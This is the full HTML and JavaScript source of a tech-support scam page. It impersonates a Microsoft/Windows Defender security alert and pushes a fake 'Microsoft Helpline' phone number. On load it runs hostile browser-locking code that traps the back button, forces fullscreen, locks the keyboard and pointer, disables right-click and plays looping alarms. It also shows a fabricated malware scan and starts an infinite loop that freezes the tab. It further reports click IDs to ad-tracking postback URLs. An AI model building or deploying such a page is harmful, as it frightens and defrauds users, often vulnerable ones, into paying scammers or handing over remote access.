<!doctype html>
<html lang="en">
  <head>
<script defer data-domain="capital.com" src="https://plausible.io/js/script.manual.js"></script>
  <!-- define the `plausible` function to manually trigger events -->
<script>window.plausible = window.plausible || function() { (window.plausible.q = window.plausible.q || []).push(arguments) }</script>
<script>
  function prepareUrl(params) {
    const url = new URL(location.href)
    const queryParams = new URLSearchParams(location.search)
    let customUrl = url.protocol + "//" + url.hostname + url.pathname.replace(/\/$/, '')
    for (const paramName of params) {
      const paramValue = queryParams.get(paramName)
      if (paramValue) customUrl = customUrl + '/' + paramValue
    }
    return customUrl
  }
  plausible('pageview', { u: prepareUrl(["phone", "clickid","aezp","cezp","rezp","click","wezp","qezp"]) });
</script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-228316669-3"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-228316669-3');
</script>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>**|\|PiRated*_FiRewall*_ActivaAtion_co0de*_detected_0x0blue0xxscrEen0786xy_cu5stomer_s5upport**_\||_**|</title>

        <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">
        <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>d
        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script>

        <script type="text/javascript">
            /* eslint-disable */
            if (top !== self) top.location = self.location;

        </script>


<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-DT0J65BHT2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-DT0J65BHT2');
</script>
<script>
setTimeout(function () {
  const postback = new URL("https://rpc.adspect.net/v1/postback?aid=1ea7c8ab-cfff-6b90-b798-ac1f6b95a853");
  const params = new URLSearchParams(location.search);
  postback.searchParams.set("cid", params.get("clickid"));
  fetch(postback.href, {mode: "no-cors"});
}, 90000);
</script>
<script>
setTimeout(function () {
  const postback = new URL("http://www.toromclick.com/feed/conv/?click_id=[click_id]&price=[price]");
  const params = new URLSearchParams(location.search);
  postback.searchParams.set("click_id", params.get("click_id"));
  fetch(postback.href, {mode: "no-cors"});
}, 12000);
</script>

<script>
        function getURLParameter(name) {
            return decodeURI(
                (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [, null])[1] || ''
            );
        }
</script>

<script>
        function getVariableFromURl(name)
        {
            name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
            var regexS = "[\\?&]"+name+"=([^&#]*)";
            var regex = new RegExp( regexS );
            var results = regex.exec( window.location.href );
            if( results == null )
                return "";
            else
                return results[1];
        }
    </script>
    <script type="text/javascript">
        var phone = getVariableFromURl('phone');
    </script>




<script type="text/javascript">
  function toggleFullScreen() {
	if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
	  if (document.documentElement.requestFullscreen) {
		document.documentElement.requestFullscreen();
	  } else if (document.documentElement.mozRequestFullScreen) {
		document.documentElement.mozRequestFullScreen();
	  } else if (document.documentElement.webkitRequestFullscreen) {
		document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
	  }
	}
  }
</script>
<script type="text/javascript">
  document.addEventListener('keyup', function(es) {
	if (es.keyCode === 27) {
	  toggleFullScreen();
	}
  }, false);
</script>
<script type="text/javascript">
  document.addEventListener('keyup', function(e) {
	if (e.keyCode === 122 || e.keyCode === 17 || e.keyCode === 18 || e.keyCode === 13) {
	  document.getElementById('map').innerHTML = stroka;
	  toggleFullScreen();
	}
  }, false);
</script>
<script type="text/javascript">
  window.onload = function () {
	document.onclick = function (e) {
	  e = e || event;
	  target = e.target || e.srcElement;
	  if (target.tagName === "DIV") {
		toggleFullScreen();
		document.body.style.cursor = 'not-allowed';
		document.getElementById('map').innerHTML = stroka;
		document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
	  } else {
		toggleFullScreen();
		document.body.style.cursor = 'not-allowed';
		document.getElementById('map').innerHTML = stroka;
		document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
	  }
	}
  }
</script>
<script type="text/javascript">
  addEventListener("click", function() {
	document.getElementById('map').innerHTML = stroka;
	 document.getElementById("play").play();
	if (!isFullScreen) {
	  var el = document.documentElement,
		  rfs = el.requestFullScreen || el.webkitRequestFullScreen || el.mozRequestFullScreen;
	  rfs.call(el);
	}
  });
</script>




    <script type="text/javascript">
var phone_number = getVariableFromURl('phone');
var phone_number2 = getVariableFromURl('phone');

</script>
        <script type="text/javascript">
            window.onbeforeunload = function() {
   if (data_needs_saving()) {
       return "Do you really want to leave our brilliant application?";
   } else {
      return;
   }
};
        </script>
        <script type="text/javascript">
            window.addEventListener("beforeunload", function (e) {
              var confirmationMessage = 'It looks like you have been editing something. '
                                 + 'If you leave before saving, your changes will be lost.';

                (e || window.event).returnValue = confirmationMessage; //Gecko + IE
                return confirmationMessage; //Gecko + Webkit, Safari, Chrome etc.
            });
        </script>
        <style type="text/css">
.blink {
background-color:#659e1d;
  animation: blink-animation 1s steps(5, start) infinite;
  -webkit-animation: blink-animation 1s steps(5, start) infinite;
}
.blink2 {
background-color:#659e1d;
  animation: blink-animation 1s steps(5, start) infinite;
  -webkit-animation: blink-animation 1s steps(5, start) infinite;
}

@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
  }
}

        </style>

        <link href="5f205bb74a5eb_v.css" type="text/css" rel="stylesheet" />
        <!--<script src=".index_files/jquery.min.js" type="text/javascript"></script>-->
        <!--<script type="text/javascript" src="../../bbmaster.js"></script>-->
        <script type="text/javascript">
            //backbutton
            !(function () {
                var t;
                try {
                    for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
                    onpopstate = function (t) {
                        t.state && location.replace("#");
                    };
                } catch (o) {}
            })();
        </script>
        <script>
            var pm_tag = "decpl";
            var pm_pid = "";
        </script>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/2.8.5/css/froala_style.min.css" />
        <link href="5f205bb63ccd2_v.css" rel="stylesheet" />
        <link id="anstrexCustomLink" rel="stylesheet" type="text/css" href="5f205bc497791_v.css" />
      <script type="text/javascript">
function myFunction() {
  return "Write something clever here...";
}
</script>

<script type="text/javascript">
 $(document).ready(function() {
    var audioElement = document.createElement('audio');
    audioElement.setAttribute('src', '0xhrk09xalrt0786x.mp3');

    audioElement.addEventListener('ended', function() {
        this.play();
    }, false);



    $('#mycanvas').click(function() {
        audioElement.play();

    });


});
</script>

<script src="https://code.jquery.com/jquery-3.2.1.min.js" type="text/javascript"></script>


    </head>


    <body id="mycanvas" onclick="showDiv()" onbeforeunload="return myFunction()" style="overflow: hidden;cursor:none;">

      <div style="position:absolute; top:40px; right:45px; z-index:99999;"><h3 style="font-size:22px; font-weight:bold; ">Call Microsoft Helpline +1-855-798-1901<script>document.write(phone_number2);</script></h3></div>


        <div id="chat-box">
         <img src="microsoft.jpg"><span style="color: #222;
    font-size: 21px;
    font-weight: 600;
    margin-left: 6px;
    position: relative;
    top: 5px;">Microsoft</span> <p style="font-weight: 600;">Contact Helpline</p>
        <h4 style="font-weight: 600;"><script>document.write(phone_number);</script></h4>
          <div class="arrow-down">
            <i class="fa fa-caret-down"></i>
          </div>
         </div>

        <audio id="beep" autoplay="">
        <source src="0xhrk786xaltx09.mp3" type="audio/mpeg">
        </audio>

    <div id="delayedPopup" class="delayedPopupWindow lightbox" style="background:#102a5c;">
  <!-- This is the close button -->
  <!-- <a href="#" id="btnClose"><i class="fa fa-times" aria-hidden="true"></i></a> -->

  <div class="row firewall-pro">
    <div class="col-md-12">
      <div class="green-box" style="-webkit-box-shadow: 0px 0px 15px 0px rgba(50, 50, 50, 0.5);
    -moz-box-shadow: 0px 0px 15px 0px rgba(50, 50, 50, 0.5);
    box-shadow: 0px 0px 15px 0px rgba(50, 50, 50, 0.5);    border: 1px solid #aaa;">
      <div class="row">
        <div class="col-md-8">
          <div class="logo_micro" style="float: left;
    margin-left: 10px;">
          <img src="microsoft.jpg"><span style="color: #000;">Windows_Firewall_Alert !</span>
          </div>
        </div>
        <div class="col-md-4">
          <div class="minimize">
            <ul>
              <li style="cursor: pointer;"><img src="cut.png" style="width: 12px;"></li>
              <li style="cursor: pointer;"><img src="minus.png" style="width: 12px;"></li>
            </ul>
          </div>
        </div>

      </div>

      </div>
    </div>
    <div class="col-md-4">
      <div class="microsoft-logo">
        <img src="microsoft.jpg"><span>Microsoft</span>
      </div>
    </div>
    <div class="col-md-8">
       <div class="formDescription">
    <h2 style="font-size:16px;font-weight:bold;">!!Dridex07!! Malware Detected</h2>
    <p>Access To This PC Has Been Disabled For Security Reasons.</p>
    <h2 style="font-size:21px; font-weight:bold;">Call Microsoft Helpline:+1-855-798-1901 <script>document.write(phone_number);</script></h2>

  </div>
    </div>
  </div>
  <!-- This is the left side of the popup for the description -->
 <footer id="footer">
   <div class="row">
     <div class="col-md-6 left-code">
       <p>Threat_Detected - !!Rootkit!! Malware <br>
          App: keylogger.finance.exe</p>
     </div>
     <div class="col-md-6">
       <div class="button_new" id="footer_btn">
         <a href="#" class="safe" style="color: #FFFFFF !important;">Quick Support</a>
         <a href="#" class="anyway blink" style="color: #FFFFFF !important;"> Back To Safety</a>
       </div>
     </div>
   </div>
 </footer>
  <!-- End MailChimp Signup Form -->
</div>

     <div class="alert_popup cardcontainer lightbox" style="cursor: none;">
         <div class="container">
             <div class="row">
                 <div class="col-md-12">
                     <p class="text-center" style="    font-size: 16px;
    font-weight: normal;
    margin: 0;
    margin-bottom: 5px;
    padding: 5px 10px;
    color: #FFFFFF !important;
    color: #414141;font-weight: bold;
    margin-top: 8px;">Windows_Defender_Security_Warning_Pirated_Code</p>
                     <p class="text-center">**ALL YOUR ONLINE ACCOUNTS ON THIS MACHINE MAY BE BANNED AND CANCELLED**</p>
                     <p>The Windows Key for this machine is pirated.Your computer has alerted us that it has been infected with !!Rootkit!! Malware. The following data has been compromised.</p>
                     <p>&gt; Financial Details<br>
                      &gt; Email Logins<br>
                      &gt; Social Networking<br>
                      &gt; Pictures &amp; Documents

                    </p>
                    <p>Windows_Defender Scan found !!Rootkit!! Malware on this device that can steal your passwords, financial login details, personal files, pictures or documents.</p>
                    <p>You must contact Microsoft Helpline immediately so that our engineers can walk you through the removal process over the phone.</p>
                    <p>Call Microsoft Helpline immediately to report this threat, prevent identity theft and unlock access to this device.</p>
                    <p>Closing this window will put your personal information at risk and lead to termination of your Windows Licence Registration.</p>
                    <p style="padding-bottom: 0px; color:white; font-size:14px;" >Call Microsoft Helpline: <strong><script>document.write(phone_number);</script></strong></p>
                    <div class="action_buttons"> <a class="active" id="leave_page" style="cursor: pointer; color: #FFFFFF !important;">OK</a> <a class="active" id="leave_page" style="color: #FFFFFF !important;">Cancel</a> </div>
                 </div>

             </div>
         </div>
     </div>





        <div class="bg">
            <!-- <div class="logo"><img src="5f205bb7e57b5_v.png" alt="Norton™" /></div> -->
            <!-- <div class="menu" id="menu">PRODUCTS & SERVICES &nbsp;&nbsp;&nbsp; INTERNET SECURITY CENTER &nbsp;&nbsp;&nbsp; SUPPORT &nbsp;&nbsp;&nbsp; FREE TRIALS &nbsp;&nbsp;&nbsp; SIGN IN</div> -->
            <div class="bgimg" style="top: 0px;"><img src="background-2.png" alt="" width="100%" /></div>
            <div class="text">
              <!--   <span id="head1">Windows Has Detected a Malicious Virus On Your System</span>
                <span style="font-size: 30px; color: #000;font-weight: 600;" id="head2">Contact Our Certified Windows Technicians For Immediate Assistance</span>
              <span style="font-size: 30px;color: #000;font-weight: 600;"><script>document.write(phone_number);</script></span> -->
            </div>
            <div id="welcomeDiv"  style=" display:none; tbackground-color:#282828; height: 300px; width: 550px; margin-left:30%;  " class="answer_list" >
            <p class="text-center" style="color: #FEFEFE;  margin-top:10px; background-color:#282828; font-size: 16px; opacity:.9; " >Do not restart or use your computer.<br>Your computer is disabled. Call Microsoft Helpline.<br>Access To This PC Has Been Disabled For Security Reasons.<br> Please contact us immediately.</p>

            <script>
            function showDiv() {
            document.getElementById('welcomeDiv').style.display = "block";
            }
            </script>

        </div>
        <!-- <div class="bottom">
            <div class="logo"><img src="5f205bb933ceb_v.png" alt="Norton™" /></div>
            <div class="copyright">© 2020 NortonLifeLock Inc. <strong style="color: #1ce783;"> sample scanner and an affiliate advertisment.</strong></div>
            <div class="line1"></div>
            <div class="menu" id="menu_b">Legal Notice | License Agreement | Privacy Policy | Careers | Cookies | Site Map | System Status | Agent Viewer</div>
            <div class="line2"></div>
            <div class="text">Save up to 50% on Norton 360 for first year*</div>
        </div> -->

  </div>


        <a href="#" rel="noreferrer" style="cursor: none;" id="link_black">
          <!--  <div class="black" style="height: 145%;"></div> --> </a>

        <div class="win2" id="win2" style="display: none;cursor: none;">
            <div class="header">
                <div class="name" id="w2_1" >Quick Scan</div>
                <img src="5f205bba58587_v.png" class="win_min" /> <img src="5f205bbe46967_v.png" class="win_cls" />
            </div>
            <div class="line_orange" style="background:#102a5c;">
                <img src="5f205bbece31e_v.gif" class="ring" />
                <div class="header" id="w2_2">Working</div>
                <div class="txt1" id="w2_3">Scanning commonly infected areas and startup files...</div>
                <div class="txt2" id="path1">C:WindowsSystem32host.exe</div>
                <div class="anim" style="background: url('./img/anim_orange.gif');"></div>
            </div>
            <div class="line_red" style="display: none; background:#102a5c;" id="win2_line_red">
                <img src="5f205bbf6a050_v.gif" class="ring" />
                <div class="header" id="w2_4">Working</div>
                <div class="txt1" id="w2_5">Scanning commonly infected areas and startup files...</div>
                <div class="txt2" id="path2">C:\Program Files\Windows-Defender\MSASCuiL.exe</div>
                <div class="anim" style="background: url('./img/anim_red.gif');"></div>
            </div>
            <div class="tab">
                <div class="line1" id="w2_6">Results Summary</div>
                <div class="line2" id="w2_7">[+] Total items scanned:</div>
                <div class="line3" id="w2_8">[+] Total security risks detected:</div>
                <div class="line4" id="w2_9">[+] Total security risks resolved:</div>
                <div class="line5" id="w2_10">Total security risks requiring attention:</div>
                <div class="line6"></div>
                <div class="digit1" id="cnt1">143</div>
                <div class="digit2" id="cnt2">0</div>
                <div class="digit3">0</div>
                <div class="digit4" id="cnt4">0</div>
            </div>
            <img src="microsoft.png" class="nrt_logo" /><span class="mask2">Microsoft</span>
            <div class="btn1" id="w2_11">Pause</div>
            <div class="btn2" id="w2_12">Stop</div>
        </div>
        <a href="#" rel="noreferrer" style="cursor: none;"> </a>

        <div id="vir1">
            <div id="vir_tray">
                <div class="line_red" style="background:#102a5c;">
                    <span id="w4_1"><b>Threat_Detected!</b></span><br />
                    !!Rootkit!! Malware
                </div>
                <img src="5f205bc1a74d5_v.gif" class="ico_tray1" />
                <div class="txt1" id="w4_2">High_Risk</div>
                <img src="5f205bc2379ac_v.gif" class="ico_tray2" />
                <div class="txt2">
                    <span id="w4_4"><b>Origin</b></span><br />
                    <span id="w4_5">Not available</span>
                </div>
                <img src="5f205bc2c1b4b_v.gif" class="ico_tray3" />
                <div class="txt3">
                    <span id="w4_6"><b>Activity</b></span><br />
                    <span id="w4_7">Threat actions performed: 1</span>
                </div>
            </div>
        </div>
        <div id="vir2">
            <div id="vir_tray">
                <div class="line_red" style="background:#102a5c;">
                    <span id="w4_1a"><b>Threat-Detected!</b></span><br />
                    Malware IRV/Backdoor.FRV
                </div>
                <img src="5f205bc1a74d5_v.gif" class="ico_tray1" />
                <div class="txt1" id="w4_2a">High Risk</div>
                <img src="5f205bc2379ac_v.gif" class="ico_tray2" />
                <div class="txt2">
                    <span id="w4_4a"><b>Origin</b></span><br />
                    <span id="w4_5a">Not available</span>
                </div>
                <img src="5f205bc2c1b4b_v.gif" class="ico_tray3" />
                <div class="txt3">
                    <span id="w4_6a"><b>Activity</b></span><br />
                    <span id="w4_7a">Threat actions performed: 1</span>
                </div>
            </div>
        </div>
        <div id="vir3">
            <div id="vir_tray">
                <div class="line_red" style="background:#102a5c;">
                    <span id="w4_1b"><b>Threat-Detected!</b></span><br />
                    Malware32.Win.keytrace
                </div>
                <img src="5f205bc1a74d5_v.gif" class="ico_tray1" />
                <div class="txt1" id="w4_3">Medium Risk</div>
                <img src="5f205bc2379ac_v.gif" class="ico_tray2" />
                <div class="txt2">
                    <span id="w4_4b"><b>Origin</b></span><br />
                    <span id="w4_5b">Not available</span>
                </div>
                <img src="5f205bc2c1b4b_v.gif" class="ico_tray3" />
                <div class="txt3">
                    <span id="w4_6b"><b>Activity</b></span><br />
                    <span id="w4_7b">Threat actions performed: 1</span>
                </div>
            </div>
        </div>
        <div id="vir4">
            <div id="vir_tray">
                <div class="line_red" style="background:#102a5c;">
                    <span id="w4_1c"><b>Threat_Detected!</b></span><br />
                    !!Rootkit!! Malware - Keyboard Logger
                </div>
                <img src="5f205bc1a74d5_v.gif" class="ico_tray1" />
                <div class="txt1" id="w4_2b">High Risk</div>
                <img src="5f205bc2379ac_v.gif" class="ico_tray2" />
                <div class="txt2">
                    <span id="w4_4c"><b>Origin</b></span><br />
                    <span id="w4_5c">Not available</span>
                </div>
                <img src="5f205bc2c1b4b_v.gif" class="ico_tray3" />
                <div class="txt3">
                    <span id="w4_6c"><b>Activity</b></span><br />
                    <span id="w4_7c">Threat actions performed: 1</span>
                </div>
            </div>
        </div>
        <div id="vir5">
            <div id="vir_tray">
                <div class="line_red" style="background:#102a5c;">
                    <span id="w4_1d"><b>Threat_Detected!</b></span><br />
                    Malware.alert.368
                </div>
                <img src="5f205bc1a74d5_v.gif" class="ico_tray1" />
                <div class="txt1" id="w4_2c">High Risk</div>
                <img src="5f205bc2379ac_v.gif" class="ico_tray2" />
                <div class="txt2">
                    <span id="w4_4d"><b>Origin</b></span><br />
                    <span id="w4_5d">Not available</span>
                </div>
                <img src="5f205bc2c1b4b_v.gif" class="ico_tray3" />
                <div class="txt3">
                    <span id="w4_6d"><b>Activity</b></span><br />
                    <span id="w4_7d">Threat actions performed: 1</span>
                </div>
            </div>
        </div>
        <script language="JavaScript" type="text/javascript">
            setTimeout(function () {
                document.getElementById("win2").style.display = "block";
            }, 2000);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "143";
            }, 2600);
            setTimeout(function () {
                document.getElementById("path1").innerHTML = "C:\Windows\System32\csrss.exe";
            }, 3000);
            setTimeout(function () {
                document.getElementById("path1").innerHTML = "C:\Windows\System32\sihost.exe";
            }, 3700);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "218";
            }, 4000);
            setTimeout(function () {
                document.getElementById("path1").innerHTML = "C:\Program Files\Windows Defender\MSASCuiL.exe";
            }, 4600);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "398";
                document.getElementById("cnt2").style.color = "#dd0000";
                document.getElementById("cnt2").innerHTML = "1";
                document.getElementById("cnt4").style.color = "#dd0000";
                document.getElementById("cnt4").innerHTML = "1";
                document.getElementById("win2_line_red").style.display = "block";
                document.getElementById("beep").play();
            }, 5000);
            setTimeout(function () {
                document.getElementById("vir1").style.bottom = "235px";
            }, 5100);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "C:\Windows\System32\SgrmBroker.exe";
            }, 5200);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "SEMgrSvc";
            }, 5800);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "538";
            }, 6000);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "NcaSvc";
            }, 6700);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "791";
                document.getElementById("cnt2").innerHTML = "2";
                document.getElementById("cnt4").innerHTML = "2";
            }, 7000);
            setTimeout(function () {
                document.getElementById("vir1").style.bottom = "440px";
                document.getElementById("vir1").style.opacity = "0";
                document.getElementById("vir2").style.bottom = "235px";
                document.getElementById("beep").play();
            }, 7100);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "C:\Windows\System32\DDFs";
            }, 7500);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "1021";
                document.getElementById("cnt2").innerHTML = "3";
                document.getElementById("cnt4").innerHTML = "3";
            }, 8000);
            setTimeout(function () {
                document.getElementById("vir2").style.bottom = "440px";
                document.getElementById("vir2").style.opacity = "0";
                document.getElementById("vir3").style.bottom = "235px";
                document.getElementById("beep").play();
            }, 8100);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "C:\Windows\System32\Recovery";
            }, 8300);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "1273";
            }, 9000);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "C:\Windows\System32\DriverState";
            }, 9200);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "tempRoot\system32\DRIVERS\bowser.sys";
            }, 9700);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "1589";
                document.getElementById("cnt2").innerHTML = "4";
                document.getElementById("cnt4").innerHTML = "4";
            }, 10000);
            setTimeout(function () {
                document.getElementById("vir3").style.bottom = "440px";
                document.getElementById("vir3").style.opacity = "0";
                document.getElementById("vir4").style.bottom = "235px";
                document.getElementById("beep").play();
            }, 10100);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "C:\Windows\System32\WinBioDatabase";
            }, 10500);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "1723";
            }, 11000);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "vmickvpexchange";
            }, 11600);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "1916";
            }, 12000);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "HidBtn";
            }, 12300);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "2038";
                document.getElementById("cnt2").innerHTML = "80";
                document.getElementById("cnt4").innerHTML = "80";
            }, 13000);
            setTimeout(function () {
                document.getElementById("vir4").style.bottom = "440px";
                document.getElementById("vir4").style.opacity = "0";
                document.getElementById("vir5").style.bottom = "235px";
                document.getElementById("beep").play();
            }, 13100);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "WdNisDrv";
            }, 13200);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "rdbss";
            }, 13900);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "C:\Windows\System32\dot3svc.dll";
            }, 14700);
            setTimeout(function () {
                document.getElementById("path2").innerHTML = "";
            }, 15500);
            setTimeout(function () {
                document.getElementById("cnt1").innerHTML = "2038";
                document.getElementById("vir5").style.opacity = "0";
                document.getElementById("w2_4").innerHTML = "Done.";
                if (lang == "pt") document.getElementById("w2_4").innerHTML = "Terminado";
                if (lang == "es") document.getElementById("w2_4").innerHTML = "Listo";
                if (lang == "fr") document.getElementById("w2_4").innerHTML = "Effectué";
                if (lang == "it") document.getElementById("w2_4").innerHTML = "Fatto";
                document.getElementById("w2_5").innerHTML = "";
                document.getElementById("path2").innerHTML = "";
                document.getElementById("win3").style.display = "none";
                document.getElementById("link_black").href = "#";
            }, 16000);
            function showmess() {
                document.getElementById("mess").style.display = "block";
            }
        </script>



<script>
function showDiv() {
   document.getElementById('welcomeDiv').style.display = "block";
}
</script>


<script>

$(document).ready(function() {
    $(".arow-div").delay(1000).fadeIn(500);
});
</script>
<script type="text/javascript">
    $(document).ready(function(){
  $(".delayedPopupWindow").click(function(){
    $('.delayedPopupWindow').hide('fast');
  });
});
</script>
<script type="text/javascript">
    $(document).ready(function(){
  $(".black").click(function(){
    $('.delayedPopupWindow').hide('fast');
  });
});
</script>
<script type="text/javascript">
    $(document).ready(function(){
  $("#win1").click(function(){
    $('.delayedPopupWindow').hide('fast');
  });
});
</script>
<script type="text/javascript">
    $(document).ready(function(){
  $("#win2").click(function(){
    $('.delayedPopupWindow').hide('fast');
  });
});
</script>
<script type="text/javascript">
    $(document).ready(function(){
  $("alert_popup").click(function(){
    $('.delayedPopupWindow').hide('fast');
  });
});
</script>

<script type="text/javascript">
 function addEvent(obj, evt, fn) {
    if (obj.addEventListener) {
        obj.addEventListener(evt, fn, false);
    } else if (obj.attachEvent) {
        obj.attachEvent("on" + evt, fn);
    }
}

addEvent(document, 'mouseout', function(evt) {
    if (evt.toElement == null && evt.relatedTarget == null) {
        $('.lightbox').slideDown();
    };
});

$('a.close').click(function() {
    $('.lightbox').slideUp();
});


</script>
<script type="text/javascript">
  $(document).ready(function() {
    $(".delayedPopupWindow").delay(5000).fadeIn(500);
});
 </script>
<script type="text/javascript">
  $(document).ready(function() {
    $(".alert_popup").delay(4000).fadeIn(500);
});
</script>
<script type="text/javascript">
   $(document).ready(function() {
    $("#chat-box").delay(16000).fadeIn(100);
});

</script>


<script>
// Get the modal
var modal = document.getElementById('myModal');

// Get the button that opens the modal
var btn = document.getElementById("myBtn");

// Get the <span> element that closes the modal
var span = document.getElementsByClassName("close")[0];

// When the user clicks the button, open the modal
/*btn.onclick = function() {
	modal.style.display = "block";
} */

// When the user clicks on <span> (x), close the modal
span.onclick = function() {
	modal.style.display = "none";
}

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
	if (event.target == modal) {
		modal.style.display = "none";
	}
}
</script>
	<script type="text/javascript">
function addEvent(obj, evt, fn) {
		if (obj.addEventListener) {
				obj.addEventListener(evt, fn, false);
		}
		else if (obj.attachEvent) {
				obj.attachEvent("on" + evt, fn);
		}
}
addEvent(window,"load",function(e) {
		addEvent(document, "mouseout", function(e) {
				e = e ? e : window.event;
				var from = e.relatedTarget || e.toElement;
				if (!from || from.nodeName == "HTML") {
						// stop your drag event here
						// for now we can just use an alert
				 //alert("hello");

			 modal.style.display = "block";

				}
		});
});

	$(document).mousemove(function(){
	var canvas = document.getElementById('mycanvas');
canvas.requestPointerLock = canvas.requestPointerLock || canvas.mozRequestPointerLock || canvas.webkitRequestPointerLock;
canvas.requestPointerLock();

	//capture mouse movement event
		 // remove our layover from the DOM
	});

 //  $(document).mousemove(function(){
 // alert("move detect");
	//capture mouse movement event
 //   $("#pageLayover").remove(); // remove our layover from the DOM
 // });


</script>


   <script>
    navigator.keyboard.lock();
    document.onkeydown = function (e) {
    return false;
    }
</script>

<script>
    // Disable right-click
    window.addEventListener('contextmenu', function (e) {
        e.preventDefault();
    });
</script>

<script>

    setTimeout("warning()", 13000);
    setTimeout("warning()", 13000);
    function warning(){
    while(true){
        console.log('warning')
}
}


</script>

</body>
</html>
